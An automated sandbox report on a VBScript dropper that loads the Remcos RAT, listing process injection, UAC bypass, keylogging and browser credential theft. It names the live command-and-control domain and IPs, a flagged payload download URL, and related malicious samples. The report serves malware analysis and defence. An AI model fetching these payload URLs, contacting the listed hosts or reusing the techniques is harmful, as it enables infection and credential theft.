                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00404F51 GetLocalTime,CreateEventA,CreateThread,7_2_00404F51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0041B69E GetComputerNameExW,GetUserNameW,7_2_0041B69E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,7_2_00449210
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 5.2.powershell.exe.19cae83f598.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.powershell.exe.19cb5e90000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.powershell.exe.19cae83f598.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.powershell.exe.19cb5e90000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.1472944209.0000019CB5E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1439903653.0000019CAE02B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.powershell.exe.19caef2a460.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.powershell.exe.19caef2a460.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.2589118650.000000000288F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2588250443.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1439903653.0000019CADA81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1439903653.0000019CAEAC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6488, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 5344, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data7_2_0040BA4D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\7_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \key3.db7_2_0040BB6B

                    Remote Access Functionality

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-RZH5WZJump to behavior
                    Source: Yara matchFile source: 5.2.powershell.exe.19cae83f598.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.powershell.exe.19cb5e90000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.powershell.exe.19cae83f598.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.powershell.exe.19cb5e90000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.1472944209.0000019CB5E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1439903653.0000019CAE02B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.powershell.exe.19caef2a460.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.powershell.exe.19caef2a460.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.2589118650.000000000288F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2588250443.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1439903653.0000019CADA81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1439903653.0000019CAEAC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6488, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 5344, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: cmd.exe7_2_0040569A
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information221
                    Scripting
                    Valid Accounts1
                    Native API
                    221
                    Scripting
                    1
                    DLL Side-Loading
                    11
                    Deobfuscate/Decode Files or Information
                    1
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Web Service
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Exploitation for Client Execution
                    1
                    DLL Side-Loading
                    1
                    Bypass User Account Control
                    3
                    Obfuscated Files or Information
                    211
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol211
                    Input Capture
                    12
                    Ingress Tool Transfer
                    Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts12
                    Command and Scripting Interpreter
                    1
                    Windows Service
                    1
                    Access Token Manipulation
                    1
                    Software Packing
                    2
                    Credentials In Files
                    1
                    System Service Discovery
                    SMB/Windows Admin Shares3
                    Clipboard Data
                    21
                    Encrypted Channel
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution
                    Login Hook1
                    Windows Service
                    1
                    DLL Side-Loading
                    NTDS3
                    File and Directory Discovery
                    Distributed Component Object ModelInput Capture1
                    Non-Standard Port
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts3
                    PowerShell
                    Network Logon Script222
                    Process Injection
                    1
                    Bypass User Account Control
                    LSA Secrets33
                    System Information Discovery
                    SSHKeylogging1
                    Remote Access Software
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                    Virtualization/Sandbox Evasion
                    Cached Domain Credentials21
                    Security Software Discovery
                    VNCGUI Input Capture2
                    Non-Application Layer Protocol
                    Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Access Token Manipulation
                    DCSync31
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal Capture23
                    Application Layer Protocol
                    Exfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job222
                    Process Injection
                    Proc Filesystem3
                    Process Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                    Application Window Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Owner/User Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519310 Sample: asegurar.vbs Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 30 paste.ee 2->30 32 23spt.duckdns.org 2->32 34 ia600100.us.archive.org 2->34 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 58 12 other signatures 2->58 9 wscript.exe 1 2->9         started        signatures3 54 Connects to a pastebin service (likely for C&C) 30->54 56 Uses dynamic DNS services 32->56 process4 signatures5 72 VBScript performs obfuscated calls to suspicious functions 9->72 74 Suspicious powershell command line found 9->74 76 Wscript starts Powershell (via cmd or directly) 9->76 78 3 other signatures 9->78 12 powershell.exe 7 9->12         started        process6 signatures7 80 Suspicious powershell command line found 12->80 82 Obfuscated command line found 12->82 84 Found suspicious powershell code related to unpacking or dynamic code loading 12->84 15 powershell.exe 14 15 12->15         started        19 conhost.exe 12->19         started        process8 dnsIp9 40 paste.ee 188.114.97.3, 443, 49704 CLOUDFLARENETUS European Union 15->40 42 ia600100.us.archive.org 207.241.227.240, 443, 49703 INTERNET-ARCHIVEUS United States 15->42 44 Writes to foreign memory regions 15->44 46 Injects a PE file into a foreign processes 15->46 21 AddInProcess32.exe 15->21         started        24 AddInProcess32.exe 3 2 15->24         started        signatures10 process11 dnsIp12 60 Contains functionality to bypass UAC (CMSTPLUA) 21->60 62 Contains functionalty to change the wallpaper 21->62 64 Contains functionality to steal Chrome passwords or cookies 21->64 70 3 other signatures 21->70 36 23spt.duckdns.org 181.236.206.3, 3000, 61775, 61776 TELEBUCARAMANGASAESPCO Colombia 24->36 38 191.93.114.27, 3000, 61743, 61748 ColombiaMovilCO Colombia 24->38 28 C:\ProgramData\remcos\logs.dat, data 24->28 dropped 66 Detected Remcos RAT 24->66 68 Installs a global keyboard hook 24->68 file13 signatures14

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    asegurar.vbs5%ReversingLabsWin32.Trojan.Generic
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                    https://go.micro0%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    http://geoplugin.net/json.gp0%URL Reputationsafe
                    http://geoplugin.net/json.gp/C0%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe
                    https://nuget.org/nuget.exe0%URL Reputationsafe
                    https://oneget.orgX0%URL Reputationsafe
                    https://aka.ms/pscore680%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://oneget.org0%URL Reputationsafe
                    http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
                    http://paste.ee0%Avira URL Cloudsafe
                    http://www.apache.org/licenses/LICENSE-2.00%Avira URL Cloudsafe
                    https://www.google.com;0%Avira URL Cloudsafe
                    https://github.com/Pester/Pester0%Avira URL Cloudsafe
                    https://analytics.paste.ee0%Avira URL Cloudsafe
                    23spt.duckdns.org0%Avira URL Cloudsafe
                    https://ia600100.us.arXr0%Avira URL Cloudsafe
                    https://paste.ee0%Avira URL Cloudsafe
                    https://aka.ms/pscore60%Avira URL Cloudsafe
                    https://paste.ee/d/tbzjY/00%Avira URL Cloudsafe
                    https://www.google.com0%Avira URL Cloudsafe
                    https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt100%Avira URL Cloudmalware
                    https://analytics.paste.ee;0%Avira URL Cloudsafe
                    https://themes.googleusercontent.com0%Avira URL Cloudsafe
                    https://ia600100.us.archive.org0%Avira URL Cloudsafe
                    http://ia600100.us.archive.org0%Avira URL Cloudsafe
                    https://secure.gravatar.com0%Avira URL Cloudsafe
                    https://cdnjs.cloudflare.com0%Avira URL Cloudsafe
                    https://cdnjs.cloudflare.com;0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ia600100.us.archive.org
                    207.241.227.240
                    truefalse
                      unknown
                      23spt.duckdns.org
                      181.236.206.3
                      truetrue
                        unknown
                        paste.ee
                        188.114.97.3
                        truetrue
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          23spt.duckdns.orgtrue
                          • Avira URL Cloud: safe
                          unknown
                          https://paste.ee/d/tbzjY/0true
                          • Avira URL Cloud: safe
                          unknown
                          https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtfalse
                          • Avira URL Cloud: malware
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.1422565655.0000019C9F49C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1439903653.0000019CADA81000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000005.00000002.1422565655.0000019C9F131000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.1422565655.0000019C9DC32000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://paste.eepowershell.exe, 00000005.00000002.1422565655.0000019C9E011000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://ia600100.us.arXrpowershell.exe, 00000005.00000002.1422565655.0000019C9EA39000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.1422565655.0000019C9DC32000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://go.micropowershell.exe, 00000005.00000002.1422565655.0000019C9EA39000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://contoso.com/Licensepowershell.exe, 00000005.00000002.1439903653.0000019CADA81000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.google.com;powershell.exe, 00000005.00000002.1422565655.0000019C9E011000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://contoso.com/Iconpowershell.exe, 00000005.00000002.1439903653.0000019CADA81000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://analytics.paste.eepowershell.exe, 00000005.00000002.1422565655.0000019C9E011000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://paste.eepowershell.exe, 00000005.00000002.1422565655.0000019C9DE35000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://aka.ms/pscore6powershell.exe, 00000002.00000002.1491722571.00000231A01B5000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.1422565655.0000019C9DC32000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://geoplugin.net/json.gpAddInProcess32.exefalse
                          • URL Reputation: safe
                          unknown
                          https://www.google.compowershell.exe, 00000005.00000002.1422565655.0000019C9E011000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://geoplugin.net/json.gp/Cpowershell.exe, 00000005.00000002.1439903653.0000019CADA81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1439903653.0000019CAEAC4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://contoso.com/powershell.exe, 00000005.00000002.1439903653.0000019CADA81000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.1422565655.0000019C9F49C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1439903653.0000019CADA81000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://oneget.orgXpowershell.exe, 00000005.00000002.1422565655.0000019C9F131000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://analytics.paste.ee;powershell.exe, 00000005.00000002.1422565655.0000019C9E011000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://ia600100.us.archive.orgpowershell.exe, 00000005.00000002.1422565655.0000019C9EA39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1422565655.0000019C9DC32000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://cdnjs.cloudflare.compowershell.exe, 00000005.00000002.1422565655.0000019C9E011000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://aka.ms/pscore68powershell.exe, 00000002.00000002.1491722571.00000231A01CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1422565655.0000019C9DA11000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://cdnjs.cloudflare.com;powershell.exe, 00000005.00000002.1422565655.0000019C9E011000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1491722571.00000231A01FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1422565655.0000019C9DA11000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://secure.gravatar.compowershell.exe, 00000005.00000002.1422565655.0000019C9E011000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://themes.googleusercontent.compowershell.exe, 00000005.00000002.1422565655.0000019C9E011000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://oneget.orgpowershell.exe, 00000005.00000002.1422565655.0000019C9F131000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://ia600100.us.archive.orgpowershell.exe, 00000005.00000002.1422565655.0000019C9F0E9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          188.114.97.3
                          paste.eeEuropean Union
                          13335CLOUDFLARENETUStrue
                          191.93.114.27
                          unknownColombia
                          27831ColombiaMovilCOtrue
                          181.236.206.3
                          23spt.duckdns.orgColombia
                          22368TELEBUCARAMANGASAESPCOtrue
                          207.241.227.240
                          ia600100.us.archive.orgUnited States
                          7941INTERNET-ARCHIVEUSfalse
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1519310
                          Start date and time:2024-09-26 10:57:09 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 6m 11s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:13
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:asegurar.vbs
                          Detection:MAL
                          Classification:mal100.rans.troj.spyw.expl.evad.winVBS@10/6@6/4
                          EGA Information:
                          • Successful, ratio: 33.3%
                          HCA Information:
                          • Successful, ratio: 92%
                          • Number of executed functions: 43
                          • Number of non-executed functions: 193
                          Cookbook Comments:
                          • Found application associated with file extension: .vbs
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target powershell.exe, PID 6488 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 968 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: asegurar.vbs
                          TimeTypeDescription
                          04:58:15API Interceptor42x Sleep call for process: powershell.exe modified
                          06:46:21API Interceptor1975952x Sleep call for process: AddInProcess32.exe modified
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          188.114.97.3HpCQgSai4e.exeGet hashmaliciousFormBookBrowse
                          • www.zhxgtlw.top/bopi/?XtEdZRAP=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4J3RpZHG8N5&8p=DXgPYZ
                          QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                          • filetransfer.io/data-package/Ky4pZ0WB/download
                          ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                          • www.1win-moldovia.fun/1g7m/
                          http://www.tiktok758.com/Get hashmaliciousUnknownBrowse
                          • www.tiktok758.com/img/logo.4c830710.svg
                          TRmSF36qQG.exeGet hashmaliciousFormBookBrowse
                          • www.zhxgtlw.top/bopi/?0T5=UL08qvZHLtV&EnAHS=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4JOdI1EXss+
                          PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                          • www.rtprajalojago.live/2wnz/
                          (PO403810)_VOLEX_doc.exeGet hashmaliciousLokibotBrowse
                          • dddotx.shop/Mine/PWS/fre.php
                          QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                          • filetransfer.io/data-package/DiF66Hbf/download
                          http://easyantrim.pages.dev/id.htmlGet hashmaliciousHTMLPhisherBrowse
                          • easyantrim.pages.dev/id.html
                          QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                          • filetransfer.io/data-package/13rSMZZi/download
                          191.93.114.27asegurar.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                            207.241.227.240SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                              LJ1IZDkHyE.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                                hnvc.vbsGet hashmaliciousPureLog StealerBrowse
                                  wm.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                                    TM3utH2CsU.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                      BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                        Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                          1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                            AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                              Order draft.vbsGet hashmaliciousAzorult, PureLog StealerBrowse
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                paste.eehnvc.vbsGet hashmaliciousPureLog StealerBrowse
                                                • 188.114.97.3
                                                wm.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                                                • 188.114.96.3
                                                Zoom_Invite.call-660194855683.wsfGet hashmaliciousXWormBrowse
                                                • 188.114.97.3
                                                reported_account_violation-pdf-67223451.wsfGet hashmaliciousXWormBrowse
                                                • 188.114.97.3
                                                New_Document-660128863990.wsfGet hashmaliciousUnknownBrowse
                                                • 188.114.96.3
                                                New_Document-660119928827.wsfGet hashmaliciousUnknownBrowse
                                                • 188.114.97.3
                                                New_Document-0706282.jsGet hashmaliciousUnknownBrowse
                                                • 188.114.96.3
                                                New_Document-0706282.jsGet hashmaliciousUnknownBrowse
                                                • 188.114.97.3
                                                asd.wsfGet hashmaliciousXWormBrowse
                                                • 188.114.97.3
                                                Commitment_for_Title_Insurance-660184790411.wsfGet hashmaliciousXWormBrowse
                                                • 188.114.97.3
                                                ia600100.us.archive.orgSecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • 207.241.227.240
                                                LJ1IZDkHyE.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                                                • 207.241.227.240
                                                hnvc.vbsGet hashmaliciousPureLog StealerBrowse
                                                • 207.241.227.240
                                                wm.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                                                • 207.241.227.240
                                                BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • 207.241.227.240
                                                Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • 207.241.227.240
                                                1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • 207.241.227.240
                                                AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • 207.241.227.240
                                                Order draft.vbsGet hashmaliciousAzorult, PureLog StealerBrowse
                                                • 207.241.227.240
                                                SPEC.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • 207.241.227.240
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                CLOUDFLARENETUShttps://cantanero.pro/Get hashmaliciousHTMLPhisherBrowse
                                                • 172.67.181.118
